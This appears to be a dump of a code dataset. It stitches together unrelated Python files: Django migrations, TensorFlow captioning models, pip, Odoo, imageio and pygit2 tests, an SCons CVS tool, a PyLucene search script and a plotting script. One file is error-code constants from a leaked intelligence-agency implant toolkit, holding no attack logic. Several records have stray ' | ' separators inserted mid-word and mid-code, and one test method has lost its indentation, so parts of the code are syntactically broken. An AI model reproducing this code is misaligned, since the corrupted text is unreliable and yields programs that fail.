                ('polymorphic_ctype', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_ninetofiver.whereaboutdate_set+', to='contenttypes.ContentType')),
                ('timesheet', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='ninetofiver.Timesheet')),
            ],
            options={
                'ordering': ['id'],
                'abstract': False,
                'base_manager_name': 'base_objects',
            },
            bases=(dirtyfields.dirtyfields.DirtyFieldsMixin, models.Model),
            managers=[
                ('objects', django.db.models.manager.Manager()),
                ('base_objects', django.db.models.manager.Manager()),
            ],
        ),
        migrations.RemoveField(
            model_name='whereabout',
            name='day',
        ),
        migrations.RemoveField(
            model_name='whereabout',
            name='timesheet',
        ),
        migrations.AddField(
            model_name='whereabout',
            name='description',
            field=models.TextField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='whereabout',
            name='user',
            field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='whereabout',
            name='location',
            field=models.CharField(choices=[('home', 'Home'), ('office', 'Office'), ('out_of_office', 'Out of office'), ('other', 'Other')], max_length=32),
        ),
        migrations.AddField(
            model_name='whereaboutdate',
            name='whereabout',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ninetofiver.Whereabout'),
        ),
    ]
|
kubeflow/kfp-tekton-backend | samples/contrib/image-captioning-gcp/src/models.py | Python | apache-2.0 | 3,943 | 0.001014 | # Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file contains the models used in the image captioning pipeline"""
import tensorflow as tf
class BahdanauAttention(tf.keras.Model):
    """Additive (Bahdanau) attention over encoded image features."""
    def __init__(self, units):
        super(BahdanauAttention, self).__init__()
        self.W1 = tf.keras.layers.Dense(units)
        self.W2 = tf.keras.layers.Dense(units)
        self.V = tf.keras.layers.Dense(1)

    def call(self, features, hidden):
        """Return (context_vector, attention_weights) for one decode step."""
        # features(CNN_encoder output) shape == (batch_size, 64, embedding_dim)
        # hidden shape == (batch_size, hidden_size)
        # hidden_with_time_axis shape == (batch_size, 1, hidden_size)
        hidden_with_time_axis = tf.expand_dims(hidden, 1)
        # score shape == (batch_size, 64, hidden_size)
        score = tf.nn.tanh(self.W1(features) + self.W2(hidden_with_time_axis))
        # attention_weights shape == (batch_size, 64, 1)
        # you get 1 at the last axis because you are applying score to self.V
        attention_weights = tf.nn.softmax(self.V(score), axis=1)
        # context_vector shape after sum == (batch_size, hidden_size)
        context_vector = attention_weights * features
        context_vector = tf.reduce_sum(context_vector, axis=1)
        return context_vector, attention_weights
# CNN Encoder model
class CNN_Encoder(tf.keras.Model):
    """Projects pre-extracted image features through one FC + ReLU layer."""
    # Since you have already extracted the features and dumped it using pickle
    # This encoder passes those features through a Fully connected layer
    def __init__(self, embedding_dim):
        super(CNN_Encoder, self).__init__()
        # shape after fc == (batch_size, 64, embedding_dim)
        self.fc = tf.keras.layers.Dense(embedding_dim)

    def call(self, x):
        """Apply the FC projection followed by ReLU activation."""
        x = self.fc(x)
        x = tf.nn.relu(x)
        return x
# RNN Decoder model
class RNN_Decoder(tf.keras.Model):
    """GRU caption decoder with Bahdanau attention, emitting vocab logits.

    Repairs a stray '|' token (syntax error) and a split 'batch | _size'
    comment from the corrupted source.
    """
    def __init__(self, embedding_dim, units, vocab_size):
        super(RNN_Decoder, self).__init__()
        self.units = units
        self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)
        self.gru = tf.keras.layers.GRU(self.units,
                                       return_sequences=True,
                                       return_state=True,
                                       recurrent_initializer='glorot_uniform')
        self.fc1 = tf.keras.layers.Dense(self.units)
        self.fc2 = tf.keras.layers.Dense(vocab_size)
        self.attention = BahdanauAttention(self.units)

    def call(self, x, features, hidden):
        """One decode step: return (logits, new_state, attention_weights)."""
        # defining attention as a separate model
        context_vector, attention_weights = self.attention(features, hidden)
        # x shape after passing through embedding == (batch_size, 1, embedding_dim)
        x = self.embedding(x)
        # x shape after concatenation == (batch_size, 1, embedding_dim + hidden_size)
        x = tf.concat([tf.expand_dims(context_vector, 1), x], axis=-1)
        # passing the concatenated vector to the GRU
        output, state = self.gru(x)
        # shape == (batch_size, max_length, hidden_size)
        x = self.fc1(output)
        # x shape == (batch_size * max_length, hidden_size)
        x = tf.reshape(x, (-1, x.shape[2]))
        # output shape == (batch_size * max_length, vocab)
        x = self.fc2(x)
        return x, state, attention_weights

    def reset_state(self, batch_size):
        """Return a zeroed initial hidden state for a batch."""
        return tf.zeros((batch_size, self.units))
|
zvezdan/pip | tests/functional/test_install_user.py | Python | mit | 11,608 | 0 | """
tests specific to "pip install --user"
"""
import os
import textwrap
from os.path import curdir, isdir, isfile
import pytest
from pip._internal.compat import cache_from_source, uses_pycache
from tests.lib import pyversion
from tests.lib.local_repos import local_checkout
def _patch_dist_in_site_packages(script):
    """Monkey-patch pip inside the test env (via sitecustomize.py) so that
    dist_in_site_packages() always reports False, letting --user installs
    proceed even when the distribution is visible in site-packages."""
    sitecustomize_path = script.lib_path.join("sitecustomize.py")
    sitecustomize_path.write(textwrap.dedent("""
        def dist_in_site_packages(dist):
            return False
        from pip._internal.req import req_install
        req_install.dist_in_site_packages = dist_in_site_packages
    """))
    # Caught py32 with an outdated __pycache__ file after a sitecustomize
    # update (after python should have updated it) so will delete the cache
    # file to be sure
    # See: https://github.com/pypa/pip/pull/893#issuecomment-16426701
    if uses_pycache:
        cache_path = cache_from_source(sitecustomize_path)
        if os.path.isfile(cache_path):
            os.remove(cache_path)
class Tests_UserSite:
    @pytest.mark.network
    def test_reset_env_system_site_packages_usersite(self, script, virtualenv):
        """
        reset_env(system_site_packages=True) produces env where a --user
        install can be found using pkg_resources
        """
        virtualenv.system_site_packages = True
        script.pip('install', '--user', 'INITools==0.2')
        # pkg_resources must resolve the user-site install from inside the env
        result = script.run(
            'python', '-c',
            "import pkg_resources; print(pkg_resources.get_distribution"
            "('initools').project_name)",
        )
        project_name = result.stdout.strip()
        assert 'INITools' == project_name, project_name
    @pytest.mark.network
    def test_install_subversion_usersite_editable_with_distribute(
            self, script, virtualenv, tmpdir):
        """
        Test installing current directory ('.') into usersite after installing
        distribute
        """
        virtualenv.system_site_packages = True
        # editable install from a local svn checkout must land in user site
        result = script.pip(
            'install', '--user', '-e',
            '%s#egg=initools' %
            local_checkout(
                'svn+http://svn.colorstudy.com/INITools/trunk',
                tmpdir.join("cache"),
            )
        )
        result.assert_installed('INITools', use_user_site=True)
    @pytest.mark.network
    def test_install_from_current_directory_into_usersite(
            self, script, virtualenv, data, common_wheels):
        """
        Test installing current directory ('.') into usersite
        """
        virtualenv.system_site_packages = True
        # wheel is needed so the install goes through the wheel code path
        script.pip("install", "wheel", '--no-index', '-f', common_wheels)
        run_from = data.packages.join("FSPkg")
        result = script.pip(
            'install', '-vvv', '--user', curdir,
            cwd=run_from,
            expect_error=False,
        )
        # both the package dir and its dist-info must appear in user site
        fspkg_folder = script.user_site / 'fspkg'
        assert fspkg_folder in result.files_created, result.stdout
        dist_info_folder = (
            script.user_site / 'FSPkg-0.1.dev0.dist-info'
        )
        assert dist_info_folder in result.files_created
    def test_install_user_venv_nositepkgs_fails(self, script, data):
        """
        user install in virtualenv (with no system packages) fails with message
        """
        run_from = data.packages.join("FSPkg")
        # --user makes no sense in an isolated virtualenv: pip must refuse
        # with a clear error rather than install somewhere invisible.
        result = script.pip(
            'install', '--user', curdir,
            cwd=run_from,
            expect_error=True,
        )
        assert (
            "Can not perform a '--user' install. User site-packages are not "
            "visible in this virtualenv." in result.stderr
        )
    @pytest.mark.network
    def test_install_user_conflict_in_usersite(self, script, virtualenv):
        """
        Test user install with conflict in usersite updates usersite.
        """
        virtualenv.system_site_packages = True
        # Install 0.3 first, then downgrade to 0.1; the usersite must end up
        # holding 0.1 with no leftovers from 0.3.
        script.pip('install', '--user', 'INITools==0.3', '--no-binary=:all:')
        result2 = script.pip(
            'install', '--user', 'INITools==0.1', '--no-binary=:all:')
        # usersite has 0.1
        egg_info_folder = (
            script.user_site / 'INITools-0.1-py%s.egg-info' % pyversion
        )
        initools_v3_file = (
            # file only in 0.3
            script.base_path / script.user_site / 'initools' /
            'configparser.py'
        )
        assert egg_info_folder in result2.files_created, str(result2)
        assert not isfile(initools_v3_file), initools_v3_file
    @pytest.mark.network
    def test_install_user_conflict_in_globalsite(self, script, virtualenv):
        """
        Test user install with conflict in global site ignores site and
        installs to usersite
        """
        # the test framework only supports testing using virtualenvs
        # the sys.path ordering for virtualenvs with --system-site-packages is
        # this: virtualenv-site, user-site, global-site
        # this test will use 2 modifications to simulate the
        # user-site/global-site relationship
        # 1) a monkey patch which will make it appear INITools==0.2 is not in
        # the virtualenv site if we don't patch this, pip will return an
        # installation error: "Will not install to the usersite because it
        # will lack sys.path precedence..."
        # 2) adding usersite to PYTHONPATH, so usersite as sys.path precedence
        # over the virtualenv site
        virtualenv.system_site_packages = True
        script.environ["PYTHONPATH"] = script.base_path / script.user_site
        _patch_dist_in_site_packages(script)
        script.pip('install', 'INITools==0.2', '--no-binary=:all:')
        result2 = script.pip(
            'install', '--user', 'INITools==0.1', '--no-binary=:all:')
        # usersite has 0.1
        egg_info_folder = (
            script.user_site / 'INITools-0.1-py%s.egg-info' % pyversion
        )
        initools_folder = script.user_site / 'initools'
        assert egg_info_folder in result2.files_created, str(result2)
        assert initools_folder in result2.files_created, str(result2)
        # site still has 0.2 (can't look in result1; have to check)
        egg_info_folder = (
            script.base_path / script.site_packages /
            'INITools-0.2-py%s.egg-info' % pyversion
        )
        initools_folder = script.base_path / script.site_packages / 'initools'
        assert isdir(egg_info_folder)
        assert isdir(initools_folder)
@pytest.mark.network
def test_upgrade_user_conflict_in_globalsite(self, script, virtualenv):
"""
Test user install/upgrade with conflict in global site ignores site and
installs to usersite
"""
# the test framework only supports testing using virtualenvs
# the sys.path ordering for virtualenvs with --system-site-packages is
# this: virtualenv-site, user-site, global-site
# this test will use 2 modifications to simulate the
# user-site/global-site relationship
# 1) a monkey patch which will make it appear INITools==0.2 is not in
# the virtualenv site if we don't patch this, pip will return an
# installation error: "Will not install to the usersite because it
# will lack sys.path precedence..."
# 2) adding usersite to PYTHONPATH, so usersite as sys.path precedence
# over th | e virtualenv site
virtualenv.system_site_packages = True
script.environ["PYTHONPATH"] = script.base_path / script.user_site
_patch_dist_in_site_packages(script)
script.pip('install', 'INITools==0.2', '--no-binary=:all:')
result2 = script.pip(
'install', '--user', '--upgrade', 'INITools', '--no-bin | ary=:all:')
# usersite has 0.3.1
egg_info_folder = (
script.user_site / 'INITools-0.3.1-py%s.egg-info' % pyversion
)
initools_folder = script.user_site / 'initools'
assert egg_info_folder in result2.files_created, str(result2)
assert initools_folder in result2.files_created, str(result2)
# site still has 0.2 (can't look in result1; have to |
DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Lib/dsz/mca/survey/cmd/registryhive/errors.py | Python | unlicense | 1,689 | 0.009473 | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: errors.py
import mcl.status

# Error codes for the registryhive survey command, offset from the MCL
# framework's reserved error range.
ERR_SUCCESS = mcl.status.MCL_SUCCESS
ERR_INVALID_PARAM = mcl.status.framework.ERR_START
ERR_INVALID_HIVE = mcl.status.framework.ERR_START + 1
ERR_INVALID_ACTION = mcl.status.framework.ERR_START + 2
ERR_MARSHAL_FAILED = mcl.status.framework.ERR_START + 3
ERR_OPEN_FAILED = mcl.status.framework.ERR_START + 4
ERR_API_UNAVAILABLE = mcl.status.framework.ERR_START + 5
ERR_LOAD_FAILED = mcl.status.framework.ERR_START + 6
ERR_UNLOAD_FAILED = mcl.status.framework.ERR_START + 7
ERR_SAVE_FAILED = mcl.status.framework.ERR_START + 8
ERR_RESTORE_FAILED = mcl.status.framework.ERR_START + 9
ERR_UNLOAD_LIST_LOCKED = mcl.status.framework.ERR_START + 10
ERR_GET_FULL_PATH_FAILED = mcl.status.framework.ERR_START + 11
ERR_SEND_FAILED = mcl.status.framework.ERR_START + 12

# Human-readable message for each error code (ERR_SUCCESS needs none).
errorStrings = {
    ERR_INVALID_PARAM: 'Invalid parameter(s)',
    ERR_INVALID_HIVE: 'Invalid hive',
    ERR_INVALID_ACTION: 'Invalid action',
    ERR_MARSHAL_FAILED: 'Marshaling data failed',
    ERR_OPEN_FAILED: 'Failed to open registry key',
    ERR_API_UNAVAILABLE: 'Unable to access the registry API',
    ERR_LOAD_FAILED: 'Failed to load hive',
    ERR_UNLOAD_FAILED: 'Failed to unload hive',
    ERR_SAVE_FAILED: 'Failed to save hive to file',
    ERR_RESTORE_FAILED: 'Failed to restore key from file',
    ERR_UNLOAD_LIST_LOCKED: 'Unable to add hive to list of hives to unload. Unload list is currently locked',
    ERR_GET_FULL_PATH_FAILED: 'Failed to get full path to hive',
    ERR_SEND_FAILED: 'Failed to send marshalled message',
}
OCA/server-tools | module_prototyper/tests/test_prototype_module_export.py | Python | agpl-3.0 | 2,979 | 0.000336 | # #############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2010 - 2014 Savoir-faire Linux
# (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import io
import zipfile
from odoo.tests import common
class TestPrototypeModuleExport(common.TransactionCase):
    """Tests for the module_prototyper export wizard."""

    def setUp(self):
        super(TestPrototypeModuleExport, self).setUp()
        self.main_model = self.env["module_prototyper.module.export"]
        self.prototype_model = self.env["module_prototyper"]
        self.module_category_model = self.env["ir.module.category"]
        # Minimal prototype record exercised by the tests below.
        self.prototype = self.prototype_model.create(
            {
                "name": "t_name",
                "category_id": self.module_category_model.browse(1).id,
                "human_name": "t_human_name",
                "summary": "t_summary",
                "description": "t_description",
                "author": "t_author",
                "maintainer": "t_maintainer",
                "website": "t_website",
            }
        )
        self.exporter = self.main_model.create({"name": "t_name"})

    def test_action_export_assert_for_wrong_active_model(self):
        """Test if the assertion raises."""
        exporter = self.main_model.with_context(active_model="t_active_model").create(
            {}
        )
        self.assertRaises(AssertionError, exporter.action_export)

    def test_action_export_update_wizard(self):
        """Test if the wizard is updated during the process."""
        exporter = self.main_model.with_context(
            active_model=self.prototype_model._name,
            active_id=self.prototype.id,
        ).create({})
        exporter.action_export()
        # After export the wizard switches to the download ("get") state
        # and is renamed after the generated archive.
        self.assertEqual(exporter.state, "get")
        self.assertEqual(exporter.name, "{}.zip".format(self.prototype.name))

    def test_zip_files_returns_tuple(self):
        """Test the method return of the method that generate the zip file."""
        ret = self.main_model.zip_files(self.exporter, [self.prototype])
        self.assertIsInstance(ret, tuple)
        self.assertIsInstance(ret.zip_file, zipfile.ZipFile)
        self.assertIsInstance(ret.BytesIO, io.BytesIO)
patricksnape/imageio | tests/test_avbin.py | Python | bsd-2-clause | 5,018 | 0.007373 | """ Test imageio avbin functionality.
"""
from pytest import raises
from imageio.testing import run_tests_if_main, get_test_dir, need_internet
import imageio
from imageio import core
from imageio.core import get_remote_file
# if IS_PYPY:
# skip('AVBIn not supported on pypy')
test_dir = get_test_dir()
def mean(x):  # pypy-compat mean (avoids np.mean)
    """Return the arithmetic mean of ndarray *x* as sum/size."""
    return x.sum() / x.size
def test_select():
    """The avbin plugin must be registered and support multi-image reads only."""
    fname1 = get_remote_file('images/cockatoo.mp4', test_dir)
    F = imageio.formats['avbin']
    assert F.name == 'AVBIN'
    # 'rI' (read multiple images) is supported; writing and single/volume
    # read modes are not.
    assert F.can_read(core.Request(fname1, 'rI'))
    assert not F.can_write(core.Request(fname1, 'wI'))
    assert not F.can_read(core.Request(fname1, 'ri'))
    assert not F.can_read(core.Request(fname1, 'rv'))
    # ffmpeg is default
    #formats = imageio.formats
    #assert formats['.mp4'] is F
    #assert formats.search_write_format(core.Request(fname1, 'wI')) is F
    #assert formats.search_read_format(core.Request(fname1, 'rI')) is F
def test_read():
    """Basic reading: length, metadata, frame shape, rewind vs. seek."""
    need_internet()
    R = imageio.read(get_remote_file('images/cockatoo.mp4'), 'avbin')
    assert R.format is imageio.formats['avbin']
    fname = get_remote_file('images/cockatoo.mp4', force_download='2014-11-05')
    reader = imageio.read(fname, 'avbin')
    assert reader.get_length() == 280
    assert 'fps' in reader.get_meta_data()
    # Writing through the avbin plugin is not supported.
    raises(Exception, imageio.save, '~/foo.mp4', 'abin')
    #assert not reader.format.can_write(core.Request('test.mp4', 'wI'))
    for i in range(10):
        im = reader.get_next_data()
        assert im.shape == (720, 1280, 3)
        # todo: fix this
        #assert mean(im) > 100 and mean(im) < 115 KNOWN FAIL
    # We can rewind
    reader.get_data(0)
    # But not seek
    with raises(IndexError):
        reader.get_data(4)
def test_reader_more():
    """Metadata, frame counting, looping, skipempty and invalid files."""
    need_internet()
    fname1 = get_remote_file('images/cockatoo.mp4')
    fname3 = fname1[:-4] + '.stub.mp4'
    # Get meta data
    R = imageio.read(fname1, 'avbin', loop=True)
    meta = R.get_meta_data()
    assert isinstance(meta, dict)
    assert 'fps' in meta
    R.close()
    # Read all frames and test length
    R = imageio.read(get_remote_file('images/realshort.mp4'), 'avbin')
    count = 0
    while True:
        try:
            R.get_next_data()
        except IndexError:
            break
        else:
            count += 1
    assert count == len(R)
    assert count in (35, 36) # allow one frame off size that we know
    # Test index error -1
    raises(IndexError, R.get_data, -1)
    # Test loop
    R = imageio.read(get_remote_file('images/realshort.mp4'), 'avbin', loop=1)
    im1 = R.get_next_data()
    for i in range(1, len(R)):
        R.get_next_data()
    # With loop=1 the reader wraps around: the frame after the last one is
    # the first frame again, and must equal an explicit get_data(0).
    im2 = R.get_next_data()
    im3 = R.get_data(0)
    assert (im1 == im2).all()
    assert (im1 == im3).all()
    R.close()
    # Test size when skipping empty frames, are there *any* valid frames?
    # todo: use mimread once 1) len(R) == inf, or 2) len(R) is correct
    R = imageio.read(get_remote_file('images/realshort.mp4'),
                     'avbin', skipempty=True)
    ims = []
    with R:
        try:
            while True:
                ims.append(R.get_next_data())
        except IndexError:
            pass
    assert len(ims) > 20 # todo: should be 35/36 but with skipempty ...
    # Read invalid
    open(fname3, 'wb')
    raises(IOError, imageio.read, fname3, 'avbin')
def test_read_format():
    """Reading with an explicit videoformat (and skipempty so mean() is stable)."""
    need_internet()
    # Set videoformat explicitly; also set skipempty, so we can test mean.
    reader = imageio.read(get_remote_file('images/cockatoo.mp4'), 'avbin',
                          videoformat='mp4', skipempty=True)
    for i in range(10):
        im = reader.get_next_data()
        assert im.shape == (720, 1280, 3)
        assert mean(im) > 100 and mean(im) < 115
def test_stream():
    """Requesting a non-existent stream index must raise IOError."""
    need_internet()
    with raises(IOError):
        imageio.read(get_remote_file('images/cockatoo.mp4'), 'avbin', stream=5)
def test_invalidfile():
    """An empty .mp4 must raise IOError; AVbinResult maps error codes."""
    need_internet()
    filename = test_dir+'/empty.mp4'
    # Create a zero-byte file that cannot possibly be decoded.
    with open(filename, 'w'):
        pass
    with raises(IOError):
        imageio.read(filename, 'avbin')
    # Check AVbinResult
    imageio.plugins.avbin.AVbinResult(imageio.plugins.avbin.AVBIN_RESULT_OK)
    for i in (2, 3, 4):
        with raises(RuntimeError):
            imageio.plugins.avbin.AVbinResult(i)
def show_in_mpl():
    """Manual helper (not a test): display a frame with matplotlib."""
    reader = imageio.read('cockatoo.mp4', 'avbin')
    # Skip the first frames so the displayed one has actual content.
    for i in range(10):
        reader.get_next_data()
    import pylab
    pylab.ion()
    pylab.show(reader.get_next_data())
def show_in_visvis():
    """Manual helper (not a test): play the video in a visvis window."""
    reader = imageio.read('cockatoo.mp4', 'avbin')
    #reader = imageio.read('<video0>')
    import visvis as vv
    im = reader.get_next_data()
    f = vv.clf()
    f.title = reader.format.name
    t = vv.imshow(im, clim=(0, 255))
    # Keep feeding frames until the window is closed.
    while not f._destroyed:
        t.SetData(reader.get_next_data())
        vv.processEvents()
run_tests_if_main()
|
Techcable/pygit2 | test/test_treebuilder.py | Python | gpl-2.0 | 2,526 | 0.001188 | # -*- coding: utf-8 -*-
#
# Copyright 2010-2014 The pygit2 contributors
#
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# In addition to the permissions in the GNU General Public License,
# the authors give you unlimited permission to link the compiled
# version of this file into combinations with other programs,
# and to distribute those combinations without any restriction
# coming from the use of this file. (The General Public License
# restrictions do apply in other respects; for example, they cover
# modification of the file, and distribution when not linked into
# a combined executable.)
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to
# the Free Software Foundation, 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
"""Tests for Index files."""
from __future__ import absolute_import
from __future__ import unicode_literals
import unittest
from . import utils
TREE_SHA = '967fce8df97cc71722d3c2a5930ef3e6f1d27b12'
class TreeBuilderTest(utils.BareRepoTestCase):
    """Tests for Repository.TreeBuilder."""

    def test_new_empty_treebuilder(self):
        # Creating a builder with no base tree must succeed.
        self.repo.TreeBuilder()

    def test_noop_treebuilder(self):
        # A builder seeded from a tree oid and written unmodified must
        # reproduce the identical tree.
        tree = self.repo[TREE_SHA]
        bld = self.repo.TreeBuilder(TREE_SHA)
        result = bld.write()
        self.assertEqual(len(bld), len(tree))
        self.assertEqual(tree.id, result)

    def test_noop_treebuilder_from_tree(self):
        # Same as above, but seeded from a Tree object instead of an oid.
        tree = self.repo[TREE_SHA]
        bld = self.repo.TreeBuilder(tree)
        result = bld.write()
        self.assertEqual(len(bld), len(tree))
        self.assertEqual(tree.id, result)

    def test_rebuild_treebuilder(self):
        # Re-inserting every entry by hand must round-trip to the same tree.
        tree = self.repo[TREE_SHA]
        bld = self.repo.TreeBuilder()
        for entry in tree:
            name = entry.name
            self.assertTrue(bld.get(name) is None)
            bld.insert(name, entry.hex, entry.filemode)
            self.assertEqual(bld.get(name).id, entry.id)
        result = bld.write()
        self.assertEqual(len(bld), len(tree))
        self.assertEqual(tree.id, result)
if __name__ == '__main__':
unittest.main()
|
dezelin/scons | scons-local/SCons/Tool/CVS.py | Python | mit | 2,859 | 0.007345 | """SCons.Tool.CVS.py
Tool-specific initialization for CVS.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Tool/CVS.py 2014/07/05 09:42:21 garyo"
import SCons.Action
import SCons.Builder
import SCons.Util
def generate(env):
    """Add a Builder factory function and construction variables for
    CVS to an Environment."""
    def CVSFactory(repos, module='', env=env):
        """Return a deprecated CVS checkout Builder for repository `repos`.

        `module`, if given, is prefixed (with a POSIX slash) to the target
        name in the checkout command.
        """
        import SCons.Warnings as W
        W.warn(W.DeprecatedSourceCodeWarning, """The CVS() factory is deprecated and there is no replacement.""")
        # fail if repos is not an absolute path name?
        if module != '':
            # Don't use os.path.join() because the name we fetch might
            # be across a network and must use POSIX slashes as separators.
            module = module + '/'
        env['CVSCOM'] = '$CVS $CVSFLAGS co $CVSCOFLAGS -d ${TARGET.dir} $CVSMODULE${TARGET.posix}'
        act = SCons.Action.Action('$CVSCOM', '$CVSCOMSTR')
        return SCons.Builder.Builder(action = act,
                                     env = env,
                                     CVSREPOSITORY = repos,
                                     CVSMODULE = module)
    #setattr(env, 'CVS', CVSFactory)
    env.CVS = CVSFactory
    # Default construction variables used by the CVS command lines above.
    env['CVS'] = 'cvs'
    env['CVSFLAGS'] = SCons.Util.CLVar('-d $CVSREPOSITORY')
    env['CVSCOFLAGS'] = SCons.Util.CLVar('')
    env['CVSCOM'] = '$CVS $CVSFLAGS co $CVSCOFLAGS ${TARGET.posix}'
def exists(env):
    # The tool is usable only if a 'cvs' executable can be found on the path.
    return env.Detect('cvs')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
lavizhao/keyword | lucene/mult_search.py | Python | apache-2.0 | 2,456 | 0.015391 | #coding: utf-8
import csv
import threading
import lucene
from lucene import getVMEnv
# NOTE: Python 2 script. The print below says "preprocessing" (Chinese).
print "预处理"
INDEX_DIR = '../index/'  # location of the prebuilt Lucene index
nt = 100000  # number of rows handled per worker thread
WRITE_DIR = "../data/mult/"  # per-thread result files are written here
lucene.initVM()
directory = lucene.SimpleFSDirectory(lucene.File(INDEX_DIR))
analyzer = lucene.StandardAnalyzer(lucene.Version.LUCENE_CURRENT)
class sub_thread(threading.Thread):
    """Worker thread: runs one Lucene search per row of its slice and
    writes '<label>,"<tag>"' lines to its own CSV result file.
    """
    def __init__(self, cont,lab,i):
        """
        Arguments:
        - `cont`: list of query strings (title + body) for this slice
        - `lab`: labels aligned one-to-one with `cont`
        - `i`: thread index, used to name the output file
        """
        threading.Thread.__init__(self)
        self.content = cont
        self.label = lab
        self.i = i
        print "len label",len(self.label)
    def run(self):
        owf = "%sresult%s.csv"%(WRITE_DIR,self.i)
        print owf
        t = open(owf,"w")
        # A thread must attach itself to the JVM before using Lucene objects.
        getVMEnv().attachCurrentThread()
        searcher = lucene.IndexSearcher(directory,True)
        a = 0
        for line in self.content:
            # Top-1 search against the 'content' field.
            query = lucene.QueryParser(lucene.Version.LUCENE_CURRENT,
                'content',analyzer).parse(line)
            results = searcher.search(query,None,1)
            score_docs = results.scoreDocs
            b = 0
            for score_doc in score_docs:
                doc = searcher.doc(score_doc.doc)
                b += 1
                result = doc['tag']
                t.write("%s,\"%s\"\n"%(self.label[a],result.strip()))
            a += 1
            if a % 10 == 0:
                # Progress (Chinese): "thread %s finished %s, fraction %s done"
                print "线程%s 完成%s,百分之%s已经完成"%(self.i,a,1.0*a/len(self.content))
def div(n, length):
    """Chunk boundaries for splitting `length` items into pieces of size `n`.

    Returns every multiple of n in [0, length], plus `length` itself so the
    final (possibly partial) chunk is always closed.
    """
    return [cut for cut in range(length + 1)
            if cut % n == 0 or cut == length]
def main():
"""
"""
print "读文件"
f = open("../data/test.csv")
reader = csv.reader(f)
content = []
for row in reader:
content.append(row[0]+" "+row[1])
print "测试数据个数",len(content)
turn = div(nt,len(content))
print turn
f.close()
print "读标签"
g = open("../data/label.txt")
| label = g.readlines()
label = [word.strip() for word in label]
label = label[1:]
for i in range(len(turn)-1):
sub_cont = content[turn[i] : turn[i+1] ]
sub_label = label[turn[i] : turn[i+1]][:]
mthread = sub_thread(sub_cont,sub_label,i)
mthread.start()
if __name__ == '__main__':
| print "hello world"
main()
|
silburt/rebound2 | examples/planetesimals2/movie/body_movie_output.py | Python | gpl-3.0 | 2,192 | 0.015055 | #This macro outputs 3D plots of the x,y,z co-ordinates of the particles. Main movie script
import sys
import matplotlib.pyplot as plt
import numpy as np
import glob
import math
pi = math.pi
from mpl_toolkits.mplot3d import Axes3D
import re
from subprocess import call
def natural_key(string_):
    """Sort key for "natural" ordering: embedded digit runs compare as ints.

    E.g. 'file2' sorts before 'file10'.
    """
    key = []
    for piece in re.split(r'(\d+)', string_):
        key.append(int(piece) if piece.isdigit() else piece)
    return key
def get_color(id, N_massive):
    """Plot color for a particle: sun (id 0) is yellow, massive bodies are
    red, planetesimals are black."""
    if id == 0:
        return 'yellow'
    if id <= N_massive:
        return 'red'
    return 'black'
N_massive = int(raw_input("Number of massive bodies (including sun): ")) - 1
dir = 'movie_output/'
files = glob.glob(dir+'hybridbody*.txt')
files = sorted(files, key=natural_key)
N_bodies = len(files) #number of files we're dealing with
#read in data for each body
data = []
try:
for f in files:
ff = | open(f, 'r')
lines = ff.readlines()
data.append(lines)
except:
print 'couldnt open', f, 'exiting'
exit(0)
